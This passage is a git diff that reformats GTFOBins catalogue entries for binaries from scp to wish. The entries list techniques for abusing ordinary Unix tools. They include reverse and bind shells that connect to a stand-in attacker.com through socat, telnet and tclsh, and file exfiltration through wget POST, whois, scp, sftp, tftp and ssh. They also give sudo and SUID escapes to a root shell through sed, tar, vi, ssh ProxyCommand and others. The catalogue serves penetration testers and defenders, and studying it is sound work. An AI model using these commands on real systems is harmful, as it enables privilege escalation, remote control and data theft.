+++ b/_gtfobins/scp.md
@@ -1,36 +1,36 @@
---
functions:
execute-non-interactive:
- - code: |
- TF=$(mktemp)
- CMD="id"
- echo "$CMD" > "$TF"
- chmod +x "$TF"
- scp -S $TF x y:
- sudo-enabled:
- - code: |
- TF=$(mktemp)
- CMD="id"
- echo "$CMD" > "$TF"
- chmod +x "$TF"
- sudo scp -S $TF x y:
- suid-limited:
- - code: |
- TF=$(mktemp)
- CMD="id"
- echo "$CMD" > "$TF"
- chmod +x "$TF"
- ./scp -S $TF a b:
+ - code: |
+ TF=$(mktemp)
+ CMD="id"
+ echo "$CMD" > "$TF"
+ chmod +x "$TF"
+ scp -S $TF x y:
upload:
- - description: Send local file to a SSH server.
- code: |
- RPATH=user@attacker.com:~/file_to_save
- LPATH=file_to_send
- scp $LFILE $RPATH
+ - description: Send local file to a SSH server.
+ code: |
+ RPATH=user@attacker.com:~/file_to_save
+ LPATH=file_to_send
+ scp $LFILE $RPATH
download:
- - description: Fetch a remote file from a SSH server.
- code: |
- RPATH=user@attacker.com:~/file_to_get
- LFILE=file_to_save
- scp $RPATH $LFILE
+ - description: Fetch a remote file from a SSH server.
+ code: |
+ RPATH=user@attacker.com:~/file_to_get
+ LFILE=file_to_save
+ scp $RPATH $LFILE
+ sudo-enabled:
+ - code: |
+ TF=$(mktemp)
+ CMD="id"
+ echo "$CMD" > "$TF"
+ chmod +x "$TF"
+ sudo scp -S $TF x y:
+ suid-limited:
+ - code: |
+ TF=$(mktemp)
+ CMD="id"
+ echo "$CMD" > "$TF"
+ chmod +x "$TF"
+ ./scp -S $TF a b:
---
diff --git a/_gtfobins/sed.md b/_gtfobins/sed.md
index fca942b..0cd0df4 100644
--- a/_gtfobins/sed.md
+++ b/_gtfobins/sed.md
@@ -1,24 +1,24 @@
---
functions:
execute-interactive:
- - description: GNU version only. Also, this requires `bash`.
- code: sed -n "1e bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
+ - description: GNU version only. Also, this requires `bash`.
+ code: sed -n "1e bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
execute-non-interactive:
- - description: GNU version only.
- code: sed -n "1e id" /etc/hosts
- sudo-enabled:
- - description: GNU version only. Also, this requires `bash`.
- code: sudo sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./sed -e '' "$LFILE"
- file-read:
- - code: |
- LFILE=file_to_read
- sed '' "$LFILE"
+ - description: GNU version only.
+ code: sed -n "1e id" /etc/hosts
file-write:
- - code: |
- LFILE=file_to_write
- sed -n "1s/.*/data/w $LFILE" /etc/hosts
+ - code: |
+ LFILE=file_to_write
+ sed -n "1s/.*/data/w $LFILE" /etc/hosts
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ sed '' "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./sed -e '' "$LFILE"
+ sudo-enabled:
+ - description: GNU version only. Also, this requires `bash`.
+ code: sudo sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
---
diff --git a/_gtfobins/setarch.md b/_gtfobins/setarch.md
index af80824..cdc0aed 100644
--- a/_gtfobins/setarch.md
+++ b/_gtfobins/setarch.md
@@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- - code: setarch $(arch) /bin/sh
- sudo-enabled:
- - code: sudo setarch $(arch) /bin/sh
+ - code: setarch $(arch) /bin/sh
suid-enabled:
- - code: ./setarch $(arch) /bin/sh -p
+ - code: "./setarch $(arch) /bin/sh -p"
+ sudo-enabled:
+ - code: sudo setarch $(arch) /bin/sh
---
diff --git a/_gtfobins/sftp.md b/_gtfobins/sftp.md
index 8c528e8..743b96f 100644
--- a/_gtfobins/sftp.md
+++ b/_gtfobins/sftp.md
@@ -1,25 +1,25 @@
---
functions:
execute-interactive:
- - code: |
- HOST=user@attacker.com
- sftp $HOST
- !/bin/sh
- sudo-enabled:
- - code: |
- HOST=user@attacker.com
- sudo sftp $HOST
- !/bin/sh
+ - code: |
+ HOST=user@attacker.com
+ sftp $HOST
+ !/bin/sh
upload:
- - description: Send local file to a SSH server.
- code: |
- RHOST=user@attacker.com
- sftp $RHOST
- put file_to_send file_to_save
+ - description: Send local file to a SSH server.
+ code: |
+ RHOST=user@attacker.com
+ sftp $RHOST
+ put file_to_send file_to_save
download:
- - description: Fetch a remote file from a SSH server.
- code: |
- RHOST=user@attacker.com
- sftp $RHOST
- get file_to_get file_to_save
+ - description: Fetch a remote file from a SSH server.
+ code: |
+ RHOST=user@attacker.com
+ sftp $RHOST
+ get file_to_get file_to_save
+ sudo-enabled:
+ - code: |
+ HOST=user@attacker.com
+ sudo sftp $HOST
+ !/bin/sh
---
diff --git a/_gtfobins/shuf.md b/_gtfobins/shuf.md
index 318fcd2..924ea0e 100644
--- a/_gtfobins/shuf.md
+++ b/_gtfobins/shuf.md
@@ -1,17 +1,17 @@
---
description: The read file content is corrupted by adding a newline.
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_write
- sudo shuf -e data -o "$LFILE"
- suid-enabled:
- - description:
- code: |
- LFILE=file_to_write
- ./shuf -e data -o "$LFILE"
file-write:
- - code: |
- LFILE=file_to_write
- shuf -e data -o "$LFILE"
+ - code: |
+ LFILE=file_to_write
+ shuf -e data -o "$LFILE"
+ suid-enabled:
+ - description:
+ code: |
+ LFILE=file_to_write
+ ./shuf -e data -o "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_write
+ sudo shuf -e data -o "$LFILE"
---
diff --git a/_gtfobins/socat.md b/_gtfobins/socat.md
index 2e84b46..dc524ff 100644
--- a/_gtfobins/socat.md
+++ b/_gtfobins/socat.md
@@ -1,14 +1,16 @@
---
functions:
reverse-shell-interactive:
- - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345
on the attacker box to receive the shell.
- code: |
- RHOST=attacker.com
- RPORT=12345
- socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
+ - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345
on
+ the attacker box to receive the shell.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
bind-shell-interactive:
- - description: Run socat FILE:`tty`,raw,echo=0 TCP:target.com:12345
on the attacker box to connect to the shell.
- code: |
- LPORT=12345
- socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
+ - description: Run socat FILE:`tty`,raw,echo=0 TCP:target.com:12345
+ on the attacker box to connect to the shell.
+ code: |
+ LPORT=12345
+ socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
---
diff --git a/_gtfobins/sort.md b/_gtfobins/sort.md
index 528d912..42f8b2c 100644
--- a/_gtfobins/sort.md
+++ b/_gtfobins/sort.md
@@ -1,15 +1,15 @@
---
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo sort -m "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./sort -m "$LFILE"
file-read:
- - code: |
- LFILE=file_to_read
- sort -m "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ sort -m "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./sort -m "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo sort -m "$LFILE"
---
diff --git a/_gtfobins/sqlite3.md b/_gtfobins/sqlite3.md
index f9ad23f..5b4f1f2 100644
--- a/_gtfobins/sqlite3.md
+++ b/_gtfobins/sqlite3.md
@@ -1,21 +1,21 @@
---
functions:
execute-interactive:
- - code: sqlite3 /dev/null '.shell /bin/sh'
- sudo-enabled:
- - code: sudo sqlite3 /dev/null '.shell /bin/sh'
- suid-limited:
- - code: ./sqlite3 /dev/null '.shell /bin/sh'
+ - code: sqlite3 /dev/null '.shell /bin/sh'
file-write:
- - code: |
- LFILE=file_to_write
- sqlite3 /dev/null -cmd ".output $LFILE" 'select "data";'
+ - code: |
+ LFILE=file_to_write
+ sqlite3 /dev/null -cmd ".output $LFILE" 'select "data";'
file-read:
- - code: |
- LFILE=file_to_read
- sqlite3 << EOF
- CREATE TABLE t(line TEXT);
- .import $LFILE t
- SELECT * FROM t;
- EOF
+ - code: |
+ LFILE=file_to_read
+ sqlite3 << EOF
+ CREATE TABLE t(line TEXT);
+ .import $LFILE t
+ SELECT * FROM t;
+ EOF
+ sudo-enabled:
+ - code: sudo sqlite3 /dev/null '.shell /bin/sh'
+ suid-limited:
+ - code: "./sqlite3 /dev/null '.shell /bin/sh'"
---
diff --git a/_gtfobins/ssh.md b/_gtfobins/ssh.md
index 71c5e10..bd3a290 100644
--- a/_gtfobins/ssh.md
+++ b/_gtfobins/ssh.md
@@ -1,30 +1,32 @@
---
functions:
execute-interactive:
- - description: Reconnecting may help bypassing restricted shells.
- code: ssh localhost $SHELL --noprofile --norc
- - description: Spawn interactive shell through ProxyCommand option.
- code: ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
- sudo-enabled:
- - description: Spawn interactive root shell through ProxyCommand option.
- code: sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
- download:
- - description: Fetch a remote file from a SSH server.
- code: |
- HOST=user@attacker.com
- RPATH=file_to_get
- LPATH=file_to_save
- ssh $HOST "cat $RPATH" > $LPATH
+ - description: Reconnecting may help bypassing restricted shells.
+ code: ssh localhost $SHELL --noprofile --norc
+ - description: Spawn interactive shell through ProxyCommand option.
+ code: ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'"
+ x
upload:
- - description: Send local file to a SSH server.
- code: |
- HOST=user@attacker.com
- RPATH=file_to_save
- LPATH=file_to_send
- ssh $HOST "cat > $RPATH" < $LPATH
+ - description: Send local file to a SSH server.
+ code: |
+ HOST=user@attacker.com
+ RPATH=file_to_save
+ LPATH=file_to_send
+ ssh $HOST "cat > $RPATH" < $LPATH
+ download:
+ - description: Fetch a remote file from a SSH server.
+ code: |
+ HOST=user@attacker.com
+ RPATH=file_to_get
+ LPATH=file_to_save
+ ssh $HOST "cat $RPATH" > $LPATH
file-read:
- - description: The read file content is corrupted by error prints.
- code: |
- LFILE=file_to_read
- ssh -F $LFILE localhost
+ - description: The read file content is corrupted by error prints.
+ code: |
+ LFILE=file_to_read
+ ssh -F $LFILE localhost
+ sudo-enabled:
+ - description: Spawn interactive root shell through ProxyCommand option.
+ code: sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh
+ -i'" x
---
diff --git a/_gtfobins/stdbuf.md b/_gtfobins/stdbuf.md
index 222d68b..c0e4181 100644
--- a/_gtfobins/stdbuf.md
+++ b/_gtfobins/stdbuf.md
@@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- - code: stdbuf -i0 /bin/sh
- sudo-enabled:
- - code: sudo stdbuf -i0 /bin/sh
+ - code: stdbuf -i0 /bin/sh
suid-enabled:
- - code: ./stdbuf -i0 /bin/sh -p
+ - code: "./stdbuf -i0 /bin/sh -p"
+ sudo-enabled:
+ - code: sudo stdbuf -i0 /bin/sh
---
diff --git a/_gtfobins/strace.md b/_gtfobins/strace.md
index 61374f4..2302f19 100644
--- a/_gtfobins/strace.md
+++ b/_gtfobins/strace.md
@@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- - code: strace -o /dev/null /bin/sh
- sudo-enabled:
- - code: sudo strace -o /dev/null /bin/sh
+ - code: strace -o /dev/null /bin/sh
suid-enabled:
- - code: ./strace -o /dev/null /bin/sh -p
+ - code: "./strace -o /dev/null /bin/sh -p"
+ sudo-enabled:
+ - code: sudo strace -o /dev/null /bin/sh
---
diff --git a/_gtfobins/tail.md b/_gtfobins/tail.md
index 73d0c97..f7090f1 100644
--- a/_gtfobins/tail.md
+++ b/_gtfobins/tail.md
@@ -1,15 +1,15 @@
---
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo tail -c1G "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./tail -c1G "$LFILE"
file-read:
- - code: |
- LFILE=file_to_read
- tail -c1G "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ tail -c1G "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./tail -c1G "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo tail -c1G "$LFILE"
---
diff --git a/_gtfobins/tar.md b/_gtfobins/tar.md
index 19fd34d..01afeef 100644
--- a/_gtfobins/tar.md
+++ b/_gtfobins/tar.md
@@ -1,24 +1,24 @@
---
functions:
execute-interactive:
- - code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
+ - code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
execute-non-interactive:
- - description: This only works for GNU tar.
- code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"'
- sudo-enabled:
- - code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
- suid-limited:
- - code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
+ - description: This only works for GNU tar.
+ code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"'
file-write:
- - description: This only works for GNU tar.
- code: |
- LFILE=file_to_write
- TF=$(mktemp)
- echo data > "$TF"
- tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P
+ - description: This only works for GNU tar.
+ code: |
+ LFILE=file_to_write
+ TF=$(mktemp)
+ echo data > "$TF"
+ tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P
file-read:
- - description: This only works for GNU tar.
- code: |
- LFILE=file_to_read
- tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
+ - description: This only works for GNU tar.
+ code: |
+ LFILE=file_to_read
+ tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
+ sudo-enabled:
+ - code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
+ suid-limited:
+ - code: "./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh"
---
diff --git a/_gtfobins/taskset.md b/_gtfobins/taskset.md
index 78630bb..7c90197 100644
--- a/_gtfobins/taskset.md
+++ b/_gtfobins/taskset.md
@@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- - code: taskset 1 /bin/sh
- sudo-enabled:
- - code: sudo taskset 1 /bin/sh
+ - code: taskset 1 /bin/sh
suid-enabled:
- - code: ./taskset 1 /bin/sh -p
+ - code: "./taskset 1 /bin/sh -p"
+ sudo-enabled:
+ - code: sudo taskset 1 /bin/sh
---
diff --git a/_gtfobins/tclsh.md b/_gtfobins/tclsh.md
index f233314..582cd12 100644
--- a/_gtfobins/tclsh.md
+++ b/_gtfobins/tclsh.md
@@ -1,21 +1,21 @@
---
functions:
execute-interactive:
- - code: |
- tclsh
- exec /bin/sh <@stdin >@stdout 2>@stderr
- sudo-enabled:
- - code: |
- sudo tclsh
- exec /bin/sh <@stdin >@stdout 2>@stderr
- suid-enabled:
- - code: |
- ./tclsh
- exec /bin/sh -p <@stdin >@stdout 2>@stderr
+ - code: |
+ tclsh
+ exec /bin/sh <@stdin >@stdout 2>@stderr
reverse-shell-non-interactive:
- - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
+ suid-enabled:
+ - code: |
+ ./tclsh
+ exec /bin/sh -p <@stdin >@stdout 2>@stderr
+ sudo-enabled:
+ - code: |
+ sudo tclsh
+ exec /bin/sh <@stdin >@stdout 2>@stderr
---
diff --git a/_gtfobins/tee.md b/_gtfobins/tee.md
index 51b3558..a10c8c7 100644
--- a/_gtfobins/tee.md
+++ b/_gtfobins/tee.md
@@ -1,17 +1,18 @@
---
-description: |
- It can only append data if the destination exists.
+description: 'It can only append data if the destination exists.
+
+'
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_write
- echo data | sudo tee -a "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_write
- echo data | ./tee -a "$LFILE"
file-write:
- - code: |
- LFILE=file_to_write
- echo data | ./tee -a "$LFILE"
+ - code: |
+ LFILE=file_to_write
+ echo data | ./tee -a "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_write
+ echo data | ./tee -a "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_write
+ echo data | sudo tee -a "$LFILE"
---
diff --git a/_gtfobins/telnet.md b/_gtfobins/telnet.md
index 80946c8..e237c64 100644
--- a/_gtfobins/telnet.md
+++ b/_gtfobins/telnet.md
@@ -1,36 +1,35 @@
---
functions:
execute-interactive:
- - description: BSD version only. Needs to be connected first.
- code: |
- RHOST=attacker.com
- RPORT=12345
- telnet $RHOST $RPORT
- ^]
- !/bin/sh
+ - description: BSD version only. Needs to be connected first.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ telnet $RHOST $RPORT
+ ^]
+ !/bin/sh
reverse-shell-interactive:
- - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
- RHOST=attacker.com
- RPORT=12345
- TF=$(mktemp)
- rm $TF
- mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ TF=$(mktemp)
+ rm $TF
+ mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
sudo-enabled:
- - description: BSD version only. Needs to be connected first.
- code: |
- RHOST=attacker.com
- RPORT=12345
- sudo telnet $RHOST $RPORT
- ^]
- !/bin/sh
+ - description: BSD version only. Needs to be connected first.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ sudo telnet $RHOST $RPORT
+ ^]
+ !/bin/sh
suid-limited:
- - description: BSD version only. Needs to be connected first.
- code: |
- RHOST=attacker.com
- RPORT=12345
- ./telnet $RHOST $RPORT
- ^]
- !/bin/sh
-
+ - description: BSD version only. Needs to be connected first.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ ./telnet $RHOST $RPORT
+ ^]
+ !/bin/sh
---
diff --git a/_gtfobins/tftp.md b/_gtfobins/tftp.md
index f391860..173edd6 100644
--- a/_gtfobins/tftp.md
+++ b/_gtfobins/tftp.md
@@ -1,15 +1,15 @@
---
functions:
upload:
- - description: Send local file to a TFTP server.
- code: |
- RHOST=attacker.com
- tftp $RHOST
- put file_to_send
+ - description: Send local file to a TFTP server.
+ code: |
+ RHOST=attacker.com
+ tftp $RHOST
+ put file_to_send
download:
- - description: Fetch a remote file from a TFTP server.
- code: |
- RHOST=attacker.com
- tftp $RHOST
- get file_to_get
+ - description: Fetch a remote file from a TFTP server.
+ code: |
+ RHOST=attacker.com
+ tftp $RHOST
+ get file_to_get
---
diff --git a/_gtfobins/time.md b/_gtfobins/time.md
index 91c6290..97c4be1 100644
--- a/_gtfobins/time.md
+++ b/_gtfobins/time.md
@@ -4,9 +4,9 @@ description: |
behave differently than` /usr/bin/time`, hence the absolute path.
functions:
execute-interactive:
- - code: /usr/bin/time /bin/sh
- sudo-enabled:
- - code: sudo /usr/bin/time /bin/sh
+ - code: "/usr/bin/time /bin/sh"
suid-enabled:
- - code: ./time /bin/sh -p
+ - code: "./time /bin/sh -p"
+ sudo-enabled:
+ - code: sudo /usr/bin/time /bin/sh
---
diff --git a/_gtfobins/timeout.md b/_gtfobins/timeout.md
index fa50e90..6a4742a 100644
--- a/_gtfobins/timeout.md
+++ b/_gtfobins/timeout.md
@@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- - code: timeout 7d /bin/sh
- sudo-enabled:
- - code: sudo timeout --foreground 7d /bin/sh
+ - code: timeout 7d /bin/sh
suid-enabled:
- - code: ./timeout 7d /bin/sh -p
+ - code: "./timeout 7d /bin/sh -p"
+ sudo-enabled:
+ - code: sudo timeout --foreground 7d /bin/sh
---
diff --git a/_gtfobins/ul.md b/_gtfobins/ul.md
index 014d734..6da459d 100644
--- a/_gtfobins/ul.md
+++ b/_gtfobins/ul.md
@@ -3,16 +3,16 @@ description: |
The read file content is corrupted by replacing occurrences of `$'\b_'` to
terminal sequences and by converting tabs to spaces.
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo ul "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./ul "$LFILE"
file-read:
- - code: |
- LFILE=file_to_read
- ul "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ ul "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./ul "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo ul "$LFILE"
---
diff --git a/_gtfobins/unexpand.md b/_gtfobins/unexpand.md
index 886d27f..601ea73 100644
--- a/_gtfobins/unexpand.md
+++ b/_gtfobins/unexpand.md
@@ -1,15 +1,15 @@
---
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo unexpand -t99999999 "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./unexpand -t99999999 "$LFILE"
file-read:
- - code: |
- LFILE=file_to_read
- unexpand -t99999999 "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ unexpand -t99999999 "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./unexpand -t99999999 "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo unexpand -t99999999 "$LFILE"
---
diff --git a/_gtfobins/uniq.md b/_gtfobins/uniq.md
index b8b09f8..d2208d6 100644
--- a/_gtfobins/uniq.md
+++ b/_gtfobins/uniq.md
@@ -1,17 +1,18 @@
---
-description: |
- The read file content is corrupted by squashing multiple adjacent lines.
+description: 'The read file content is corrupted by squashing multiple adjacent lines.
+
+'
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo uniq "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./uniq "$LFILE"
file-read:
- - code: |
- LFILE=file_to_read
- uniq "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ uniq "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./uniq "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo uniq "$LFILE"
---
diff --git a/_gtfobins/unshare.md b/_gtfobins/unshare.md
index 412774b..222cac2 100644
--- a/_gtfobins/unshare.md
+++ b/_gtfobins/unshare.md
@@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- - code: unshare /bin/sh
- sudo-enabled:
- - code: sudo unshare /bin/sh
+ - code: unshare /bin/sh
suid-enabled:
- - code: ./unshare -r /bin/sh
+ - code: "./unshare -r /bin/sh"
+ sudo-enabled:
+ - code: sudo unshare /bin/sh
---
diff --git a/_gtfobins/vi.md b/_gtfobins/vi.md
index 43ff1da..a6849d1 100644
--- a/_gtfobins/vi.md
+++ b/_gtfobins/vi.md
@@ -1,20 +1,21 @@
---
functions:
execute-interactive:
- - code: vi -c ':!/bin/sh'
- - code: |
- vi
- :set shell=/bin/sh
- :shell
- sudo-enabled:
- - code: sudo vi -c ':!/bin/sh'
- suid-enabled:
- - code: ./vi -c ':!/bin/sh -p'
- file-read:
- - code: |
- vi file_to_read
+ - code: vi -c ':!/bin/sh'
+ - code: |
+ vi
+ :set shell=/bin/sh
+ :shell
file-write:
- - code: |
- vi file_to_write
- w
+ - code: |
+ vi file_to_write
+ w
+ file-read:
+ - code: 'vi file_to_read
+
+'
+ suid-enabled:
+ - code: "./vi -c ':!/bin/sh -p'"
+ sudo-enabled:
+ - code: sudo vi -c ':!/bin/sh'
---
diff --git a/_gtfobins/watch.md b/_gtfobins/watch.md
index ef24de0..dc8fd22 100644
--- a/_gtfobins/watch.md
+++ b/_gtfobins/watch.md
@@ -1,12 +1,12 @@
---
functions:
execute-non-interactive:
- - code: watch /usr/bin/id
- sudo-enabled:
- - code: sudo watch /usr/bin/id
+ - code: watch /usr/bin/id
suid-enabled:
- - description: This keeps the SUID privileges only if the `-x` option is present.
- code: ./watch -x /usr/bin/id
+ - description: This keeps the SUID privileges only if the `-x` option is present.
+ code: "./watch -x /usr/bin/id"
+ sudo-enabled:
+ - code: sudo watch /usr/bin/id
suid-limited:
- - code: ./watch /usr/bin/id
+ - code: "./watch /usr/bin/id"
---
diff --git a/_gtfobins/wget.md b/_gtfobins/wget.md
index 1c141e6..16ccf00 100644
--- a/_gtfobins/wget.md
+++ b/_gtfobins/wget.md
@@ -1,15 +1,16 @@
---
functions:
upload:
- - description: Send base64-encoded local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
- code: |
- export URL=http://attacker.com/
- export LFILE=file_to_send
- wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL
+ - description: Send base64-encoded local file via "d" parameter of a HTTP POST request.
+ Run an HTTP service on the attacker box to collect the file.
+ code: |
+ export URL=http://attacker.com/
+ export LFILE=file_to_send
+ wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL
download:
- - description: Fetch a remote file via HTTP GET request.
- code: |
- export URL=http://attacker.com/file_to_get
- export LFILE=file_to_save
- wget $URL -O $LFILE
+ - description: Fetch a remote file via HTTP GET request.
+ code: |
+ export URL=http://attacker.com/file_to_get
+ export LFILE=file_to_save
+ wget $URL -O $LFILE
---
diff --git a/_gtfobins/whois.md b/_gtfobins/whois.md
index f0e0d21..71bffd9 100644
--- a/_gtfobins/whois.md
+++ b/_gtfobins/whois.md
@@ -1,31 +1,37 @@
---
-description: |
- `whois` hangs waiting for the remote peer to close the socket.
+description: "`whois` hangs waiting for the remote peer to close the socket.\n"
functions:
upload:
- - description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` and its length is limited by the maximum size of arguments.
- code: |
- RHOST=attacker.com
- RPORT=12345
- LFILE=file_to_send
- whois -h $RHOST -p $RPORT "`cat $LFILE`"
- - description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' | base64 -d > "file_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments.
- code: |
- RHOST=attacker.com
- RPORT=12345
- LFILE=file_to_send
- whois -h $RHOST -p $RPORT "`base64 $LFILE`"
+ - description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"`
+ on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'`
+ and its length is limited by the maximum size of arguments.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ LFILE=file_to_send
+ whois -h $RHOST -p $RPORT "`cat $LFILE`"
+ - description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d'
+ | base64 -d > "file_to_save"` on the attacker box to collect the file. The file
+ length is limited by the maximum size of arguments.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ LFILE=file_to_send
+ whois -h $RHOST -p $RPORT "`base64 $LFILE`"
download:
- - description: Fetch remote text file from a remote TCP port. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. The file has instances of `$'\x0d'` stripped.
- code: |
- RHOST=attacker.com
- RPORT=12345
- LFILE=file_to_save
- whois -h $RHOST -p $RPORT > "$LFILE"
- - description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | nc -l -p 12345` on the attacker box to send the file.
- code: |
- RHOST=attacker.com
- RPORT=12345
- LFILE=file_to_save
- whois -h $RHOST -p $RPORT | base64 -d > "$LFILE"
+ - description: Fetch remote text file from a remote TCP port. Run `nc -l -p 12345
+ < "file_to_send"` on the attacker box to send the file. The file has instances
+ of `$'\x0d'` stripped.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ LFILE=file_to_save
+ whois -h $RHOST -p $RPORT > "$LFILE"
+ - description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send"
+ | nc -l -p 12345` on the attacker box to send the file.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ LFILE=file_to_save
+ whois -h $RHOST -p $RPORT | base64 -d > "$LFILE"
---
diff --git a/_gtfobins/wish.md b/_gtfobins/wish.md
index a65439e..e495e28 100644
--- a/_gtfobins/wish.md
+++ b/_gtfobins/wish.md
@@ -1,17 +1,17 @@
---
functions:
execute-interactive:
- - code: |
- wish
- exec /bin/sh <@stdin >@stdout 2>@stderr
- sudo-enabled:
- - code: |
- sudo wish
- exec /bin/sh <@stdin >@stdout 2>@stderr
+ - code: |
+ wish
+ exec /bin/sh <@stdin >@stdout 2>@stderr
reverse-shell-non-interactive:
- - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
